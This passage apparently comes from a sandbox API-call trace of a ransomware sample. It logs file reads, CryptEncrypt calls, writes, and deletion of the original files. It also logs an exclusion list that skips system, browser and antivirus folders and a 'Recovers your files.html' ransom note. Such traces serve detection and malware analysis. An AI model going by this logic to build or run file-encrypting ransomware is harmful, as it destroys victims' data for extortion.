lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.470] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.470] GetLastError () returned 0x0 [0153.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.470] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.470] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.470] GetLastError () returned 0x0 [0153.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.471] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.471] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.471] GetLastError () returned 0x0 [0153.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.471] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.471] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.471] GetLastError () returned 0x0 [0153.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.471] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.471] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.471] GetLastError () returned 0x0 [0153.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.471] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.471] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.471] GetLastError () returned 0x0 [0153.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.471] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.471] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.471] GetLastError () returned 0x0 [0153.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.471] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.471] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.471] GetLastError () returned 0x0 [0153.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.472] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.472] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.472] GetLastError () returned 0x0 [0153.472] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.472] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.472] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.472] GetLastError () returned 0x0 [0153.472] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.472] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.472] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.472] GetLastError () returned 0x0 [0153.472] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.472] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.472] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.472] GetLastError () returned 0x0 [0153.472] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.472] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.472] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.472] GetLastError () returned 0x0 [0153.472] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.472] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.472] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.472] GetLastError () returned 0x0 [0153.472] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.472] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.473] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.473] GetLastError () returned 0x0 [0153.473] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.476] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 1 [0153.476] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi")) returned 0 [0153.477] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" [0153.477] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0153.477] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCA99.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxca99.tmp")) returned 0xca99 [0153.478] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCA99.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxca99.tmp"), dwFlags=0x1) returned 0 [0153.478] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCA99.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxca99.tmp")) returned 1 [0153.479] CryptDestroyKey (hKey=0x9ad838) returned 1 [0153.479] wcslen (_String="OK") returned 0x2 [0153.479] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.479] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.479] CryptDestroyKey (hKey=0x9ad478) returned 1 [0153.479] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0153.479] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*NMCRYPT") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*.exe") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*.dll") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*.lnk") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*.bat") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*.ini") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*.msi") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*.scf") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*AppData*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*\\java\\*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*\\windows\\*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*Atheros*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*Realtek*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*bootmgr*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*boot*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*boot*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0153.479] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*IO.SYS*") returned 0 [0153.480] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0153.480] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0153.480] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*ntldr*") returned 0 [0153.480] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*chrome*") returned 0 [0153.480] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*opera*") returned 0 [0153.480] PathMatchSpecW (pszFile="tabskb.dll.mui", pszSpec="*firefox*") returned 0 [0153.480] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui", pszSpec="*") returned 1 [0153.480] strlen (_Str="NMoreira") returned 0x8 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: 